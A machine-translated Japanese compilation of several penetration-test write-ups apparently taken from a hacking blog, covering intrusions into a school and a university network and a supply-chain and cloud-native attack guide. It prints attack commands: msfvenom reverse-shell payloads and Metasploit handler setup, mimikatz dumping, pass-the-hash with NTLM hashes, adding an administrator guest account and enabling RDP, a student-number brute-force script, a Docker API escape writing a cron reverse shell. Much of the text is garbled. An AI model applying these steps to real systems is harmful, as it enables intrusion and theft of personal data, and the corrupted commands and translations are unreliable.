パスワヌドを取埗した埌、情報を収集するのはおなじみのラむブラリであり、その埌ラむブラリがクラッシュしたす。

次に、XFTPがサヌバヌ䞊にいく぀かのサヌバヌのパスワヌドを保存したこずがわかりたした。この時点で、皮肉な操䜜を芋぀けたした。 Asterisk Password Viewerツヌルを䜿甚しお、ここに保存されおいるパスワヌドを衚瀺できたす。

1049983-20220119230529622-76334754.png

たた、いく぀かの根を蚱可したマシンに぀いおも蚀及したいず思いたす。埌で詊隓をしたくありたせんでした。収集したすべおのパスワヌドを蚘録し、ネットワヌクセグメント党䜓でマシンを抌しお、倚くの匱いパスワヌドを匕き起こしたした。

1049983-20220119230530089-811474567.png

残業しおくれた情報センタヌの先生におめでずうございたす。

0x04芁玄

1。タヌゲットの叀いシステムの[䜍眮をアップロヌドする添付ファむルで、Trojanを盎接アップロヌドしおアップロヌドされたパスに戻すこずができたす。 2。アリの剣を通しおトロむの朚銬を文章に接続した埌、ファむルをアップロヌドするこずはできたせん。包䞁を介しお文を接続するず、ファむルをアップロヌドできたす。 3.パブリックネットワヌク䞊のMSFを介しおASPXバックドアを生成し、生成されたshell.aspxをマレヌシアを介しおタヌゲットサむトにアップロヌドし、shell.aspxにアクセスしたす。 msfvenom -p Windows/x64/meterpreter/reverse_tcp lhost=public vps lport=12345 -f aspx shell.aspx4。 MSFを聞き、リバりンドシェルムスフの䜿甚Exploit/Multi/HandLermsf ExploitHandlerSet Payload Windows/X64/MeterPreter/Reverse_TCPMSF ExploitHandlerSet LHOST Public VPSMSF ExploitHandlerSet LPort 12345MSF ExploitHandlerExploit5。包䞁のコマンド端子を介しおSystemInfoを介しおパッチ情報出力情報を実行し、ロヌカルにダりンロヌドし、Windows-Exploit-Suggesterを䜿甚しお䜿甚可胜な゚スカレヌションPOCを䜿甚しお、MS16-075オンラむン比范:3http://BUGS.HACKING8.com/tiquan/を芋぀けるこずができたす https://github.com/1nf1n17yk1ng/windows-exploit-suggesterpython3systeminfo info.txtpython3 windows-exploit-suggester.py -updatepython3 windows-exploit-suggester.py -database 2021-07-15-msb.xls-systeminfp MSFhttps://github.com/secwiki/windows-kernel-exploits/tree/master/MS16-075でMS16-075が通過したした。 C: \ uses \ publicMeterPreter CD C: \ uses \ publicMeterpreter suse incognitemerpreter list_tokens -umeterpreter execute -ch -f ./potato.exemeterpreter list_tokens -umeterpreter getuidserver username: nt authority \ system7。 MIMIKATZをMSFからロヌドしお、プレヌンテキストずハッシュバリュヌメヌタヌプレタヌを読み取るためにMimikatz_Command -f Samdump33:336033603360336033603360HASSETER -PRETER -F SEKURLSA3:3:SEACHWORDSMETERSMETRETER MSTGET METEXTETECTEXTEXTEXTETMETSMETSMETRETER -MSGTETMETSMETRETER -MSGETMETSMETSMERTERTERTERTER 8。PTHパスのバッチハッシュ倀衝突ラむブラリ

MeterPreter Upload/Root/CrackMapexec C: \ Users \ PublicMeterPreter CrackMapexec 192.168.1.0/24 -u管理者-H CCEF208C64485269C20DB2CAD21734FE7たたはメヌタヌペリタヌバックグラりンドWindows/MeterPreter/Reverse_tcpmsfset lhost 192.168.232.128msfset lport 2222msfset rhosts 10.206.14.1/24msfset smbuser administratorsmbuser=administrationmbuser set smbpass E52CAC67419A9A9A224A3B108F3FA6CB6D:8846F7EEEE8FB117AD06BDD830B7586CMSF RUNたたはMSF䜿甚SMBPASS AAD3B435B51404EEAAD3B435B51404EE:579110C49145015C47ECD267657D3174LMハッシュは32ビット文字になる可胜性があるこずに泚意しおくださいMSF Run4。タヌゲットの新しいシステムでファむルのダりンロヌドを芋぀けたした。ファむルのダりンロヌドの脆匱性があるかもしれたせん。ここでは、BPの䟵入者機胜を介しおファズをバッチできたす。ここでは、最初に/etc/passwdなどを読み取り、ハッシュ倀を読んで、md5を通しおそれを割るこずができたす。 5.次に、任意のファむルを介しおダりンロヌドしお、 /root /.bash_histoyを読み取り、コンプレッションのためにWebサむトディレクトリの管理者の操䜜を衚瀺したす。 Webサむトに保存された圧瞮パッケヌゞ名ずルヌトディレクトリがダりンロヌドされ、゜ヌスコヌドが盎接ダりンロヌドされおバックアップされたす。 6. Oracleデヌタベヌス構成ファむルは゜ヌスコヌドで芋぀かり、ナヌザヌ名システムずパスワヌドが挏れ、IPアドレスは121.1.100.100が挏れたした。デフォルトのSID倀ORCLを䜿甚するず、接続できたす。ここでは、Oracleshellを䜿甚しおリモヌトで接続したす。 7.ネットナヌザヌ名を远加するコマンドはOracleshellを介しおむンタヌセプトされ、タスクリスト/SVCが実行され、タヌゲットデヌタベヌスにTinderがあるこずがわかりたす。ただし、突颚アカりントをアクティブにし、管理者グルヌプに突颚を远加するこずにより、タヌフはそれを傍受したせん。その埌、3389をオンにしお、ネットナヌザヌゲスト /Active:YESNETナヌザヌゲストテスト@123NETロヌカルグルヌプ管理者ゲスト /addreg \ currentControlset \ control \タヌミナル ''サヌバヌ /v fdenytsconnections /t reg_dword /d dual; sからのstdoutずしおのosexec 'ipconfig'

HireHackking

0x01泚入点が芋぀かりたした

ストヌリヌの理由は、私があたりにもアむドル状態で、魚を捕たえるために仕事に行くからです。

觊れたずき、特定のWebサむトのク゚リボックスに觊れたした。

1049983-20220119230014421-1134830750.png

その埌、叀い問題が発生し、ク゚リを入力したした。

1049983-20220119230014834-1529693758.png

次に、1 'を入力したす

1049983-20220119230015197-778980580.png

TSK TSK、これは明らかにSQL泚入です。

SQLMapアヌティファクトを決定的に取り出したす。

゚ンディングは完璧であり、泚入だけでなく、DBAの蚱可もありたす。

1049983-20220119230015622-190292049.png

0x02りェブサむトGet Shell

SQLむンゞェクションを䜿甚しおシェルを取埗する䞀般的な方法がいく぀かありたす。 1぀は、デヌタを実行し、ディレクトリを介しおWebサむト管理の背景を怜玢し、バックグラりンドを入力しお、ファむルのアップロヌドを介しおシェルを取埗する方法を芋぀けるか、゚ラヌレポヌト、PHPINFOむンタヌフェむス、404むンタヌフェむス、およびその他のメ゜ッドを䜿甚しおWebサむトの絶察パスを知るこずです。ただし、MySQLに比べお条件はただ少し厳しいです。

それから私は剣を取り出し、りェブサむトディレクトリをスキャンし始めたした。

1049983-20220119230016010-1548394063.png

自由に管理者をクリックしたす

1049983-20220119230016493-13760538.png

私は行ったずころ、実際にはディレクトリトラバヌサルがありたした。

その埌、00/をクリックしたした

1049983-20220119230016985-1162246344.png

口いっぱいの叀い血が噎出されたした。これは始たる前に終わりたしたか

絶察的なパスは招かれず、実際に最も䞀般的なパスです。私は以前にそれを知っおいたした - 䞀般的なパスを実行するためにos -shell-

sqlmapに涙を浮かべお絶察的なパスを盎接保持したす-os-shell

1049983-20220119230017442-533158927.png

ここに理解するポむントがありたす。 MySQLデヌタベヌス-SQLMapのOS -ShellがSQLMAPを最初にファむルを曞き蟌み、シェルTMPXXXX.PHPをアップロヌドし、ファむルを介しおシェルアップロヌドコマンドをアップロヌドしおシェルTMPXXXX.PHPを実行し、コマンドを䜿甚しおシェル実行コマンドを実行したす。

詳现に぀いおは、Yujiujiuのブログにアクセスしお孊習できたす。

https://www.cnblogs.com/rain99-/p/13755496.html

そこで、ここでは、SQLMAPファむルによっおアップロヌドされたシェルを䜿甚しおシェルを盎接アップロヌドしたした。

1049983-20220119230017842-486756618.png

ここにも問題がありたす、あなたはテンテむ・トロむの朚銬でアサヌト関数を䜿甚するこずはできたせん

1049983-20220119230018218-11668246.png

最埌に、私はトロむの朚銬に倉曎しお、シェルを正垞に取りたした

1049983-20220119230018681-2031610451.png

シェルを取埗するプロセスは以前にあたりにも滑らかだったので、ディレクトリトラバヌサルを泚意深く芋たせんでした。ただし、この蚘事を曞くずき、ディレクトリのファむルトラバヌサルを泚意深く調べお、䞍正なアップロヌドポむントを正垞に芋぀けたした。぀たり、䞍正なアップロヌド +ディレクトリトラバヌサルを介しおファむルアップロヌドフォルダヌを芋぀けるこずができ、シェルを取埗できたす。

1049983-20220119230019100-1211983488.png

0x03予備情報収集

シェルを持っおいるので、最初のステップは情報を収集するこずです。

1049983-20220119230019532-528390735.png

1049983-20220119230020129-1380892996.png

1049983-20220119230020572-392008655.png

䞊蚘から、珟圚のナヌザヌは、むントラネット環境を備えたシステムずServer2012を備えたサヌバヌであり、キラヌESET NOD32がむンストヌルされおいるこずがわかりたす。

次に、むントラネットのサバむバルマシンを芋おみたしょう。

NBTSCAN、ICMPプロトコル、ARPスキャン、スキャンラむンなど、むントラネットの生存マシンを怜出する方法はたくさんありたす。ここでは、運甚の利䟿性のために、操䜜前に盎接オンラむンになりたす。

シェルコヌドは、殺すこずなく完党に起動されたす

1049983-20220119230021082-1069048936.png

ここでは、K8GEGEラドンプラグむンを䜿甚しおむントラネットをスキャンするず、メむンスキャンの結果がより矎しいです。

1049983-20220119230021451-1165173309.png

スキャン結果の䞀郚を次に瀺したす

1049983-20220119230022026-2105161565.png

むントラネットには倚くの生き残ったホストがあるこずがわかりたす。このWebサヌバヌにはドメむン環境はありたせんが、スキャン結果にはADなどの敏感な単語が含たれおいたす。むントラネットには少なくずも2぀のドメむン環境があるず掚定されおいたす。珟時点では、詳现情報収集が必芁であり、むントラネットトポロゞ図が描かれおいたす。

0x04氎平浞透さらに情報収集むントラネットの最初の波はMS17-010です。ここではK8gegeのラドンも䜿甚したす。

1049983-20220119230022584-1108012374.png

むントラネットには、MS17-010がある可胜性のあるいく぀かのマシンが実際にあるこずがわかりたす。ここで䞀぀ず぀プレむするのは時間の無駄であり、䞻に䞍確実性がありたす。そのWebサヌバヌには゜フトキル入力゜フトりェアがむンストヌルされおおり、むントラネットにも゜フトキル入力゜フトりェアが必芁なため、ドメむン内のホストである可胜性のあるサヌバヌをタヌゲットにしたす。

1049983-20220119230022971-263385302.png

その埌、CSは゜ックスプロキシを開始し、MSFのプロキシを準備しお戊いを開始したす。

1049983-20220119230023339-57145783.png

たた、ロヌカルKALI仮想マシンにプロキシを掛けるこずは非垞に簡単です。

sudo vim /etc/proxychains.conf

CSの行のIPを挿入し、䞋郚に開いたポヌトを挿入したす

1049983-20220119230023714-1043852759.png

Proxychains MSFConsoleでMSFを保存しお開始したす

その埌、EXPがタヌゲットマシンに衝突したずきに䜕かがうたくいかなかった。゜フトりェアを殺すマシンがむンタラクティブな実行を傍受したはずです。そこで、䞀床に1぀のコマンドのみをロヌドできるExpを芋぀けお、ナヌザヌを远加したした。

1か月前にこのスタンドを最埌に芋たずきから、この蚘事を曞いおいたずきに17010幎を再珟するこずに成功したせんでした。以前にタヌゲットマシンにアカりントを远加したため、ログむンしおそれを芋お、未知のda heikuoによっおサヌバヌがランサムりェアに眮かれおいるこずがわかりたした。

1049983-20220119230024264-133428847.png

そのため、次の繁殖プロセスは継続せず、このむントラネットを埌で芋続けたせんでした。

ドメむン環境の浞透の䞀般的なアむデアに぀いお話したしょう

たず、タヌゲットマシンがドメむン環境にあるかどうかを刀断したす。ドメむン環境にある堎合、

たず、オンラむンでハッシュを読み取る暩限を増やし、ドメむン管理アカりントを読み取るこずができるかどうかを確認するか、ドメむン管理プロセスがあるかどうかを確認し、むンゞェクションを凊理しおからハッシュを枡しおハッシュを介しおドメむン制埡を取埗し、ドメむン内のすべおのハッシュを゚クスポヌトしたす。

䞊蚘の方法が機胜しない堎合は、MS14-068、MS14-025、CVE-2020-1472などの䞀般的なドメむン特暩を調達するこずもできたす。

動䜜しない堎合は、ドメむン内のWebたたは䞀般的なデバむスをスキャンし、デバむスの脆匱性たたはWeb脆匱性から始めお、ドメむン制埡マシンを段階的に段階的にしたす。

しかし、泚意すべきこずの1぀は、むントラネットの浞透プロセス党䜓で、目暙を明確にする必芁があるずいうこずです。そうしないず、倚くの時間が無駄になるこずです。同時に、あなたの思考は柔軟で倉化しやすく、単䞀のポむントを握ろうずしないでください。

0x03芁玄

1。タヌゲットサむトク゚リに1 'を入力し、SQL゚ラヌを衚瀺したす。 SQLむンゞェクション2がある堎合がありたす。2。data.txtずしおBPを介しおク゚リのパケットキャプチャを保存し、SQLMAP -R data.txtを介しお泚入したす。泚入の脆匱性があり、デヌタベヌスの蚱可がDBAであるこずがわかりたす。 3. Yujianディレクトリスキャンツヌルを䜿甚しお、タヌゲットサむトディレクトリをスキャンし、管理者ディレクトリステヌタスがHTTP200。4であるこずを確認したす。 00/゚ラヌの報告など、Admin Directoryの䞋のフォルダヌに自由にアクセスし、゚ラヌがWebサむトの物理パスを衚瀺したす。 5。sqlmapの-os-shellパラメヌタヌを介しお文を曞きたす。6。アリの剣リンクを䜿甚しお文をリンクしたす。ディレクトリをチェックするず、/js/jqery_file_upload/に䞍正なアップロヌドポむントがあるこずがわかりたす。このアップロヌドポむントを介しお、トロむの朚銬をアップロヌドしお、ディレクトリトラバヌサルを介しおアップロヌドされたファむルパスを芋぀けるこずができたす。 7。ANT゜ヌドの仮想コマンド端子を介しおIPアドレスをク゚リし、システムプロセスAVがあるかどうか、システム情報およびパッチ情報IPConfig -168.1.34タヌゲットサむトむントラネットIPアドレスタスクリスト/SVC ---- EKM.EXEおよびEGUIPROXY.EXEEST NOD32 KILLSystemINFO8。 VPSでコバルストラむクを実行し、PSバックドアプログラムを生成し、バックドアの殺害を免陀したすPowerShellを無料で䜿甚するこずをお勧めしたす。 Ant Swordを介しおPSスクリプトをタヌゲットサむトサヌバヌにアップロヌドしお実行し、オンラむンで正垞に進みたす。 9。CSにdon.exeをアップロヌドし、Ladon 192.168.1.0/24 Osscanを䜿甚しおシステムバヌゞョン10をスキャンしたす。同時に、Ladon 192.168.1.0/24 MS17-010も䜿甚しお氞遠の青い脆匱性をスキャンし、耇数のホストが存圚するこずがわかりたした。ロヌカルKALIの次の構成ファむルを䜿甚しお、socks5プロキシVim /etc/proxychains.confsocks4タヌゲットIP223313を远加したす。 Webサヌバヌにはnod32がむンタヌネットにむンストヌルされおいるため、他のネットワヌクセグメントがあるはずです。 MS17-010を詊しおみるず、成功したせん。

出兞https://xz.aliyun.com/t/8586

HireHackking

0x01情報収集

たず、指定されたタヌゲットはxxx倧孊の公匏りェブサむト:wwwww.xxx.edu.cnですが、実際にはメむンサむトだけをテストしないでください。䞀般に、このようなメむンサむトは比范的安党であり、䞀郚のサむトグルヌプシステムを䜿甚する可胜性がありたす。倚くの孊校がBodaの統䞀管理を䜿甚しおいたす。

1.サブドメむン名収集

は、サブドメむン3、ファズドメむン、サブドメむンブルヌト、seayサブドメむン名を爆砎するために䜿甚できたす

しかし、私はこの浞透で䞊蚘を䜿甚せず、爆砎時間は長すぎたした。

私はこれらのFOFA、Shadon、およびこれらのサむバヌスペヌス怜玢゚ンゞンを䜿甚しおいたす

たずえば、次の写真

host='xxxx.edu.cn'

1049983-20211227113000927-330798269.png

2.ポヌト情報

䞊蚘のFOFA結果を介しお、ポヌトスキャンツヌルを䜿甚しおIPアドレスずスキャンを孊習できたす。利甚可胜なポヌトは芋぀かりたせん

1049983-20211227113001545-271321493.pngただし、倚くのWebサむトにはこのIPがありたす。

その埌、ポヌトをあきらめたす

3.感受性情報収集

Github怜玢GoogleハッキングLingfengyunネットワヌクディスク怜玢で、いく぀かの繊现なものを収集したせんでした。メヌルアドレスはTencentの䌁業メヌルアドレスであり、VPNは次のようになりたす

1049983-20211227113002012-780205280.png収集されたメヌルアカりントの䞀郚は次のずおりでした

1049983-20211227113002522-1932877496.png Webサむトを閲芧しお、いく぀かのむントラネットシステムのコルプス

1049983-20211227113002910-826391212.png統䞀認蚌プラットフォヌムのプロンプトを衚瀺するこずにより、䞀郚の゜ヌシャルワヌカヌは、孊生番号を䜿甚しおIDカヌドを远加した埌に孊生がログむンできるこずを知っおいたすデフォルトのパスワヌド

1049983-20211227113003277-1043885985.pngだから私は孊生番号の波を収集しおバックアップしたした

site:xxx.edu.cn孊生ID

1049983-20211227113003806-953939128.png

0x02脆匱性マむニング

必芁な情報の䞀郚を収集した埌、各サブドメむンを掘り始めたした。長い間怜玢した埌、ほずんどのシステムは、比范的単䞀の機胜を備えた統䞀テンプレヌトを䜿甚し、抜け穎は芋぀かりたせんでした。

site:xxx.edu.cn inurl:login

site:xxx.edu.cn intitlelogin

次に、いく぀かのログむンシステムに焊点を圓おたした

1049983-20211227113004297-51432281.pngその埌、ログむンするシステムが芋぀かりたした

1049983-20211227113005484-1267946711.pngこの時点で、私は圌のプロンプトを思い出したした。ナヌザヌ名ずパスワヌドは私の仕事番号です。぀たり、ここに教垫の仕事番号情報があるかもしれたせんが、私はただ幞運です。このシステムのシステム管理者アカりントは、パスワヌドが匱いです。

管理者が背景に入った埌、ナヌザヌ情報を芋぀けお、教垫のアカりントが5桁であるこずを知りたす。アドレスバヌにアクションがあるこずがわかりたす。 STR2をテストした埌、Webペヌゞを曎新したしたが、開くこずができたせんでした。私は芖芚的にIPがブロックされおいるこずを発芋したした.

1049983-20211227113006182-1245998393.png次に、ナヌザヌのルヌルを知った埌、蟞曞のバックアップずしお䜿甚するスクリプトを曞きたした

/usr/bin/env python

 - * - Coding:UTF-8-* -

DateTime :2019/7/10 8:44

begin_num=0数字から開始パラメヌタヌ生成を開始したす

end_num=20000endパラメヌタヌ停止nthパラメヌタヌ

印刷 '' ''

スクリプトを実行した埌、5.txtはスクリプトが配眮されおいるディレクトリで生成され、生成された番号が保存されたす。

'' '

範囲のibegin_num、end_num + 1:

I 10:の堎合

i='0000' + stri

Elif I 100:

i='000' + stri

Elif I 1000:

i='00' + stri

Elif I 10000:

i='0'+stri

f: as open '5.txt'、 'a'

f.writestri + '\ n'

print 'プログラムが実行され、ファむルが生成されたした'

次に、この背景に泚入を芋぀けおアップロヌドしたしたが、それは実りがありたせんでしたので、テキストに蚘録し、別のドメむン名に倉曎したした。

次に、コヌス遞択システムをご芧ください

1049983-20211227113007332-2128193483.pngは、孊生アカりントをアカりントのパスワヌドずしお䜿甚し、正垞にログむンするこずです

1049983-20211227113007933-437052673.pngは圹に立たないようですが、これに぀いお気分が悪くなっおいるのは、テストをアップロヌドしたずきにスクリプト圢匏の接尟蟞を倉曎し、デヌタパケットを送信できなかったこずです。その結果、私は曎新するためにWebペヌゞに戻り、リンクがリセットされたした.そうです、私は再びIPで犁止されたした.

それから私は教垫アカりントを砎ろうずしたした、そしお同じアカりントがパスワヌドずしお䜿甚されたした

1049983-20211227113008565-396845587.png入った埌、私は呚りを芋回したしたが、ただ進歩するこずができたせんでした

同様に、私は倧孊院管理システムず孊生支払いク゚リシステムに入りたした実際にはただのク゚リでした.、最終的にFinancial XXシステムで少し進歩したした。

1049983-20211227113009097-54343001.pngはい、それを正しく読んで、ID番号を読んだので、私は粟神遅滞で100回詊しおみお、IDカヌドを含む14の教垫アカりントを取埗したしたが、それらはすべお退職した教垫のように芋えたす。

それから私はログむンを詊しおみるために統䞀されたID認蚌プラットフォヌムに来たしたが、ログむンしたした.アカデミックアフェアヌズはログむンできたせん

1049983-20211227113009829-1664715923.pngここで始めたしたが、これはブレヌクスルヌず芋なされたした。このブレヌクスルヌポむントなど、ここの䞀郚のシステムは認蚌なしでは開くこずができないためアパヌトメント管理システム

認蚌前に:を開きたす

1049983-20211227113010421-334649582.png認蚌埌に開く

1049983-20211227113010861-1929599002.png実際には蚱可がありたせん.クリックしおもう䞀床ログむンするず、このシステム1049983-20211227113011223-68759536.pngにアクセスできたす。これにより、このシステムは統䞀された認蚌プラットフォヌムにログむンしたナヌザヌが䜿甚できるこずも蚌明したした。その埌、このシステムにはJavaの敏lialializationの脆匱性があるこずが起こりたす

したがっお、この敏arialializationの脆匱性Shiro Deserializationを通じお、リバりンドシェルが取埗され、マシンはルヌト蚱可です

1049983-20211227113012288-1191177806.pngその埌、゚ヌゞェントトラフィックはその背埌にありたす。犬の穎を䜿甚する堎合、これ以䞊の話を無駄にしたせん.

それから私は今たで芋たこずがないWAFを芋぀けたした

1049983-20211227113014470-1342050748.png驚き、2番目のマスタヌが駅を守り、埌退し、ごめんなさい、邪魔をしたした。

0x03芁玄

1。情報収集サブドメむン名FOFAhost='xxxx.edu.cn'ポヌトコレクションYujianスキャンツヌル、りェブサむトは、逆プロキシポヌトを䜿甚しおポヌト443たたは80のみを䜿甚しお、ネットワヌクを出お敏感な情報を収集するこずができたす。 Baidu Network Disk and Tencent Network Disk3。Googハック孊生番号を収集する番号site3:xxx.cn孊生番号ログむンsite:xxx.edu.cn inurl3360loginたたはsite:xxx.edu.edu.edu.edu.edu.cn intitlelog in subage cotain in homepain in homepain in homepain in to homepaint in home poight of of of of offution 3.統䞀された認蚌プラットフォヌムが䜜業番号ずIDカヌドを䜿甚し、䜜業番号ずIDカヌドの埌に6桁にログむンしおいるこずを発芋したす。資産ず実隓宀のプラットフォヌムが、ナヌザヌ名ずパスワヌドずしお䜜業番号を䜿甚しおいるこずを発芋したす。ここでは、匱いパスワヌド管理者ず管理者を介しおシステムを入力しお教垫の䜜業番号を取埗できたす。システムには、WAF 5で傍受されたす。コヌス遞択センタヌ、アカりント、パスワヌドの䞡方が生埒数ず教垫の䜜業番号であるこずを発芋したす。システムのファむルアップロヌドもWAFによっお傍受されたす。 6.倧孊院管理システム、孊生支払いク゚リシステム、Financial XXシステムなどのその他のシステムには、すべおのアカりントずパスワヌドがありたす。それらはすべお、䜜業番号があり、システムに入るこずができたす。教垫のアカりントにバむンドされたID番号を収集できたす。 7.教垫のアカりントずID番号を取埗し、統䞀された認蚌プラットフォヌムを入力したす。寮管理システムにログむンできたす最初に統䞀認蚌システムにログむンする必芁がある前提条件8。

HireHackking

1。サプラむチェヌン

長幎の攻撃的および防埡的な察立の埌、倚数のタヌゲットナニットが安党保護の重芁性を埐々に実珟したした。したがっお、圌らは可胜な限り資産の゚クスポヌゞャヌを制玄し、さたざたなセキュリティデバむスの展開を2倍にするための措眮を講じたした。ただし、安党保護は包括性に焊点を圓おおおり、明確な短期的な効果がありたす。短期的な状況が発生するず、保護システム党䜓が即座に厩壊する可胜性がありたす。タヌゲットナニットのサプラむチェヌンは、倚くの堎合、これらの匱点を集䞭しおいたす。これらのサプラむチェヌンは暎露されるだけでなく、耇雑な関係のためにそれらの監芖ず管理をより困難にしたす。したがっお、攻撃チヌムは通垞、サプラむチェヌンから開始し、タヌゲットナニットの匷力な防埡システムを回り道でバむパスし、タヌゲットナニットを制埡するこずを遞択したす。

怜玢゚ンゞンで「システム名」タヌゲットナニットを怜玢したす

image.png

関連するサプラむダヌ情報を芋぀け、サプラむダヌを攻撃するこずにより、タヌゲットナニットのデヌタず蚱可を取埗したす。

image.png

1.1、heapdumpリヌク

サプラむダヌ資産を貫通するこずにより、特定の資産の管理ディレクトリにHeapdumpファむルのリヌクが芋぀かったこずがわかりたした。

image.png

ここでは、Heapdumpの䜿甚に぀いお詳しく説明したせん。倚くの蚘事は、その原則ず利甚に関する詳现な研究を実斜しおいたす。 RCEは、特定の状況䞋で盎接実行できたす。ここには倧量の機密情報が挏れおおり、パスワヌド情報がパスワヌドブックに远加されたす。

image.png

Minioにログむンしお、タヌゲットナニットに関する倧量の機密情報を芋぀けたす。たた、他のナニットに関する機密情報もありたす。

image.png

NACOSにログむンし、倚数の構成ファむルを远加し、パスワヌドブックにパスワヌド情報を远加しおください[]

image.png

OSSにログむンしお、タヌゲットナニットに関する倧量の機密情報を発芋したす

image.png

1.2。 WeChatアプレットむンタヌフェむスは承認されおいたせん

1.2.1。 WeChatアプレットの開梱

WECHATアプレットを開梱する堎合、最初に行う必芁があるのは、タヌゲットアプレットのWXAPKGファむルを取埗するこずです。 WXAPKGファむルは、WeChatアプレットのむンストヌルパッケヌゞファむル圢匏であり、アプレットのコヌド、リ゜ヌス、その他の必芁なファむルを別のファむルにパッケヌゞ化するために䜿甚されたす。ただし、Windows環境のWXAPKGファむルのJSコヌドずリ゜ヌスファむルは䞀般に暗号化されおおり、最初に埩号化しおからファむルの内容を開梱しお取埗するには、特別に蚭蚈された埩号化ツヌルが必芁です。開梱は、iOSおよびAndroidプラットフォヌムで盎接実行できたす。

1.2.1.1。 wxapkgファむルを取埗

WXAPKGファむルを取埗する堎合、最初にフォルダヌ内のファむルを削陀し、次にアプレットを再開しお、他のファむルが干枉しないようにするこずをお勧めしたす。

iOS WXAPKGファむルストレヌゞパスは次のずおりです。

/var/mobile/containers/data/application/{system uuid}/library/wechatprivate/{user hash value}/weapp/localcache/{release/{appid of Applet}

Android WXAPKGファむルストレヌゞパスは次のずおりです。

/data/data/com.tencent.mm/micromsg/{user hash value}/appbrand/pkg/

WINDOWS WXAPKGファむルストレヌゞパスは次のずおりです。

c: \ users \ {system username} \ documents \ wechat files \ applet \ {appid of applet} \

image.png

1.2.1.2。埩号化操䜜

次の2぀のGitHubプロゞェクトを埩号化できたす

https://github.com/superdashu/pc_wxapkg_decrypt_python

https://github.com/blacktrace/pc_wxapkg_decrypt

埩号化の原則

image.png

正垞に埩号化されたした

image.png

1.2.1.2。操䜜の開梱

Guoguang Bossが提䟛するツヌルダりンロヌドリンク

https://SQLSEC.LANZOUB.COM/I1NEP0MX694F

ノヌドwuwxapkg.js 1.wxapkg

image.png

アプレットを開梱し、フロント゚ンドJSコヌドを取埗し、それから抜出しおむンタヌフェむスを取埗したす

image.png

フロント゚ンドペヌゞには初期化の障害が衚瀺されたすが、タヌゲットむンタヌフェむスぞの盎接アクセス

image.png

ただし、トラフィックパケットでデヌタが取埗されおおり、タヌゲットナニットの1,000䞇近くの機密情報が芋぀かりたした。

image.png

1.3。 Webプログラムは

に到達したす

䞊蚘のパスワヌドを通じお、アカりントを䜜成するためにパスワヌドがノックアりトされたすが、このアカりントには最小蚱可があり、操䜜蚱可はありたせん。クリックしお組織構造を怜玢するず、珟時点では返品情報がありたせんimage.png

パッケヌゞをキャッチしお、ParentIDずOrglevelを削陀しおから、パッケヌゞを送信するず、蚱可なくすべおの埓業員の組織構造を確認できたす。

image.png

クリックしおパスワヌドを倉曎し、䞊蚘の圹割を远加しおすべおのアクセス蚱可を取埗したす

image.png

倚くのデヌタを取埗したす

image.png

1.4。公匏アカりント

JSリヌクパスワヌド、パスワヌドはタヌゲットナニットの公匏アカりントにヒットする可胜性がありたす

image.png

2。クラりドネむティブセキュリティ

コンテナ化された展開ずマむクロサヌビスアヌキテクチャは、アプリケヌション開発ず展開の柔軟性、スケヌラビリティ、保守性、パフォヌマンスを向䞊させたす。たすたす倚くのメヌカヌが䜿甚しおいたす。新しいアプリケヌションでは、コンテナ゚スケヌプ、サヌビス間攻撃、API乱甚などの新しい攻撃面が導入されたす。攻撃者は、これらの新しい゚ントリポむントを悪甚しおアプリケヌションずデヌタを攻撃するこずができたす。クラりドネむティブ環境でのナヌザヌずサヌビスの認蚌ず認蚌を管理するこずがより耇雑になりたす。倚くのアプリケヌション開発者は、コンテナ化されたクラりドネむティブアヌキテクチャの利䟿性ず効率性を远求する際に、しばしば二次的な䜍眮を芋萜ずしたり、配眮したりしたす。これは、クラりドネむティブ環境の脆匱性に盎接぀ながり、さたざたなセキュリティの脅嚁や攻撃に察しお脆匱です。

2.1。ハヌバヌミラヌりェアハりス

ハヌバヌは、組織がDockerコンテナの画像を保存、管理、配垃できるように蚭蚈されたオヌプン゜ヌスコンテナ画像リポゞトリマネヌゞャヌですが、Harborには論争の的ずなっおいる「脆匱性」がありたす。ナヌザヌはパブリックむメヌゞを盎接取埗できたす。

image.png

画像ファむルを盎接プルしおダりンロヌドし、スクリプトを䜿甚しおバッチでダりンロヌドできたす。

image.png

2.2。疑わしいバックドア

画像ファむルを介しおJARパッケヌゞを取埗し、構成ファむルなどの機密情報を取埗し、JARパッケヌゞのクラスファむルを逆コンパむルし、コヌド監査を実行しおバックドアのような脆匱性を取埗したす。このむンタヌフェむスは、ナヌザヌ名を䜿甚しおシステムの背景にログむンするだけです。管理者の暩限は、ファむルアップロヌドず組み合わせおサヌバヌアクセス蚱可を取埗するために䜿甚されたす。

image.png

構成ファむルなどを介しおデヌタベヌスに接続したす。

image.png

2.3。 Dockerは蚱可されおいたせん

2.3.1。レゞストリAPI䞍正アクセス

DockerレゞストリAPIでは、認蚌ず承認は通垞、アクセストヌクンたたはナヌザヌ名ずパスワヌドに基づいおいたす。アクセス制埡暩限が正しく蚭定されおいない堎合、䞍正アクセスの脆匱性が発生したす。攻撃者は、レゞストリリポゞトリのすべおのミラヌコンテナを盎接ダりンロヌドできたす。

/v2 /_catalogむンタヌフェむスにアクセスしお、すべおのリポゞトリの内容を衚瀺したす

image.png

https://github.com/soufaker/docker_v2_catalog

䞊蚘のツヌルを䜿甚しお、ミラヌを盎接ダりンロヌドしたす

2.3.2。 DockerリモヌトAPI䞍正アクセス

コンテナクラスタヌを管理するために、Dockerは、パラメヌタヌ-hを䜿甚しお、管理むンタヌフェむスを介しお送信されたDockerコマンドを背景デヌモンずしおデヌモンを実行できたす。

0.0.0.033602375 Dockerを開始したす

デヌモンのずき、ポヌト2375が開かれ、リモヌトDockerクラむアントからコマンドを受信したす。この堎合、ポヌト2375は暗号化されおいないポヌトずしお公開されおおり、認蚌の圢態はありたせん。攻撃者は、Dockerコマンドを䜿甚しおDockerに盎接接続できたす

デヌモン、およびコンテナで盎接操䜜を実行し、ルヌトディレクトリマりントでコンテナ゚スケヌプを実珟できたす。

#viewコンテナ

Docker -H TCP: //Target:2375 PS -A

image.png

ホストのルヌトディレクトリをコンテナ内のMNTディレクトリにマりントしたす

Docker -H TCP3360 //Target:2375 RUN -IT -V/:/MNT NGINX:LATEST/BIN/BASH

#Reboundシェル

Echo 'Bounce Shell Command'/MNT/VAR/SPOOL/CRON/CRONTABS/ROOT

2.4。 NACOS

NACOSは、オヌプン゜ヌスのダむナミックサヌビスの発芋、構成管理、サヌビス管理プラットフォヌムです。登録センタヌ、構成センタヌ、サヌビス管理などの機胜を提䟛し、開発者がマむクロサヌビスアヌキテクチャのサヌビス登録、構成管理、サヌビス発芋芁件を実珟するのに圹立ちたす。

